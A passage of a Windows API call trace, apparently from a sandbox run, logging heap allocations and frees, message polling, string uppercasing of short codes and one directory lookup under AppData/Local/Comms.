returned 0 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0155.039] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0155.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0155.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0155.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0155.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0155.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0155.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0155.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0155.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0155.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0155.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0155.041] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0155.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0155.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0155.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0155.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0155.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0155.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0155.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0155.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0155.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0155.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0155.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0155.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0155.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0155.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0155.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0155.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0155.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0155.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0155.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0155.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0155.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0155.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0155.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0155.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0155.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0155.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0155.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0155.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0155.072] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Comms", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 0x9e1e38 [0155.072] FindClose (in: hFindFile=0x9e1e38 | out: hFindFile=0x9e1e38) returned 1 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0155.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0155.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0155.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0155.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0155.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0155.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0155.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0155.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0155.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0155.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0155.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0155.078] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8d0 [0155.078] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0155.078] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.078] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0155.078] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.078] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.078] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0155.078] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0155.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0155.079] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0155.079] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 